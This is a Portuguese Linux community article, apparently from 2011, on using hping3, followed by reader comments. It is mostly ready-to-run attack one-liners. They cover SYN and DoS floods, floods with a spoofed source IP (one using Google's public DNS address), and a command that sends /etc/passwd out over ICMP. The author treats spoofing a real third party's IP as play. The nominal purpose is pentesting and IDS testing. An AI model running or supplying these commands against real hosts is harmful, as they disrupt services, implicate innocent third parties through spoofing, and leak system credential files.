Utilizando hping
Neste artigo farei uma apresentação e alguns exemplos de utilização do hping, uma ferramenta muito útil para trabalhos de pentest, testar IDS, firewall.
[ Hits: 88.775 ]
Por: Marcos Carraro em 09/08/2011
Exemplos
Exemplos básicos
Floodar com 10mil syn um ip na porta 80:# hping3 --flood --syn -c 10000 -a 1.2.3.4 -p 80 200.157.25.8
DoS - O ataque DoS, tem a ideia de fazer com que a placa de rede, ip, banda, não consiga respirar, fazendo disso uma parada dos serviços, ela simplesmente não consegue mais responder.
# hping3 --flood 200.157.25.8
DoS com outra TTL - Podemos mudar os nossos "HOPS" para chegar em nosso destino como neste caso, e fazemos uma inundação de 100 pacotes com ttl 250 para o IP, podemos usar outras tantas combinações de uma linha.
# hping --flood --ttl 250 --count 100 192.168.0.1
Spoof com um falso IP - Esta parte é legal até, podemos mandar milhares de pacotes com outro IP, não cheguei a testar em um FW público.
# hping --spoof 1.2.3.4 192.168.0.1
(hping --spoof FALSOIP IPQUENTE)
DoS com spoofing - Que tal fazer um DoS e IP spoofing ao mesmo tempo? Colocamos um IP falso para que o "destino" não desconfie EHEHEHEH. Isso é ate legal de se fazer, com testes interno funciona perfeitamente.
# hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2
Spoof Loucão - HAHHA que tal mandar várias inundações loucamente para um IP?
# hping3 --spoof 192.168.0.2 --icmp-ts 192.168.0.1
(hping3 --spoof MEUIP --icmp-ts IPDESTINO)
Exemplos mais complexos
Flood com assinatura - No caso ele vai enviar alguns pacotes com esta rotulação podendo ser um arquivo ou simplesmente na escrita, como vemos nos exemplos.# hping3 --flood --syn -a 1.2.3.4 -e "TESTANDO" -S -s 80 192.168.0.1
Monitorando com tcpdump:
0x0000: 45c0 006a 9f79 0000 4001 7e97 ac10 01d1 E..j.y..@.~..... 0x0010: ac10 01d1 0303 590b 0000 0000 4500 004e ......Y.....E..N 0x0020: e171 0000 4011 3d6b ac10 01d1 ac10 01d1 .q..@.=k........ 0x0030: 0a28 0007 003a 0902 5445 5354 4554 4553 .(...:..TESTETES 0x0040: 5445 0a00 0000 0000 0000 0000 0000 0000 TE.............. 0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................Criando arquivo de assinatura:
# echo "TESTETESTE" > /vat/tmp/assinatura.sig
Enviando o ataque:
# hping -2 -p 7 192.168.0.3 -d 50 -E /var/tmp/assinatura.sig
Para monitorar:
# tcpdump -i ethX -nX proto 17
0x0000: 45c0 006a 9f79 0000 4001 7e97 ac10 01d1 E..j.y..@.~..... 0x0010: ac10 01d1 0303 590b 0000 0000 4500 004e ......Y.....E..N 0x0020: e171 0000 4011 3d6b ac10 01d1 ac10 01d1 .q..@.=k........ 0x0030: 0a28 0007 003a 0902 5445 5354 4554 4553 .(...:..TESTETES 0x0040: 5445 0a00 0000 0000 0000 0000 0000 0000 TE.............. 0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................Transferir informações pelo ICMP - Que parte louca, sim quando esta lendo alguns manuais na internet achei engraçado esta parte:
# hping 192.168.0.3 --icmp -d 100 --sign signature --file /etc/passwd
Monitorando:
# tcpdump -i ethX -nX
A saída é bem parecida.
2. Instalação
3. Exemplos
4. Finalizando
Switch HP + Gerenciador Console + VLAN + DMZ + CentOS com VLAN
OpenBSD IDS - Solução Snort e BASE
Implementação de OpenVAS-5 em Ubuntu 10.04.4 LTS
Monitorando máquinas Windows com o Nagios
Bloqueio de repetidas tentativas de login ao seu Linux
hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2
Veja a Ultima linha do traceroute 8.8.8.8
google-public-dns-a.google.com (8.8.8.8)
O exemplo de flood loucão no DNS do google foi sem querer?
Com a falta de IPs v4 válidos até aquele que achávamos inexistentes estão sendo usados. Logo logo o clássico exemplo 1.2.3.4 não será mais fictício, logo teremos que apelar para 300.300.300.300 hehehehe
Bom artigo.
Muito bom artigo parceiro!
Será de grande ajuda aos iniciantes e um manualzinho de referencia a alguns preguiçosos(assim como eu)!
auhsuahsuahushuahuhas
Parabéns!
@dvdia Cara, mostrei o dns do google, com um exemplo, podendo usar um IP real de outra pessoa para brincar.... ;D
300 Oo
@denisleandro é magnata, imagina o trablho que deu para escrever HEHEHHE, sorte dos livros pois o manual dos caras não é o bicho.
abraços e aproveitam para acessar o blog também marcoscarraro.blogspot.com
Marcos Carraro
marcos gostei da tool , ja conhecia mais não sabia o seu uso , so não deixa o pessoal do lulzsec saber hein rs rs
abraços
outra coisas , acho que esse artigo devia ter ido para o segurança linux , seria o local mais apropriado .
Instalação no Slackware também pode ser via SlackBuilds.
Se tiver o sbopkg é mais fácil ainda
# sbopkg -i hping3
Valeu galera....
Espero que gostem, se alguém tiver mais conteudo a adicionar sera bem vindo...
Não esqueçam de visitar meu blog....
marcoscarraro.blogspot.com
abraços Marcos Carraro
Patrocínio
Destaques
Artigos
Enviar mensagem ao usuário trabalhando com as opções do php.ini
Meu Fork do Plugin de Integração do CVS para o KDevelop
Compartilhando a tela do Computador no Celular via Deskreen
Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota
Configuração para desligamento automatizado de Computadores em um Ambiente Comercial
Dicas
Criando uma VPC na AWS via CLI
Multifuncional HP imprime mas não digitaliza
Dica básica para escrever um Artigo.
Como Exibir Imagens Aleatórias no Neofetch para Personalizar seu Terminal
Tópicos
Pegar a ultima ocorrencia viva (1)
Pq me aparece isso quando fui atualizar o Ubuntu 24.10 no terminal? (1)
como coloco para instalar com esse erro. (13)
Alguém sabe de documentos de texto e /ou vídeo aulas de certificações ... (1)
Top 10 do mês
-
Xerxes
1° lugar - 68.252 pts -
Fábio Berbert de Paula
2° lugar - 52.330 pts -
Buckminster
3° lugar - 19.423 pts -
Mauricio Ferrari
4° lugar - 16.160 pts -
Alberto Federman Neto.
5° lugar - 15.005 pts -
Daniel Lara Souza
6° lugar - 14.169 pts -
Diego Mendes Rodrigues
7° lugar - 13.822 pts -
edps
8° lugar - 11.745 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
9° lugar - 11.195 pts -
Andre (pinduvoz)
10° lugar - 10.971 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
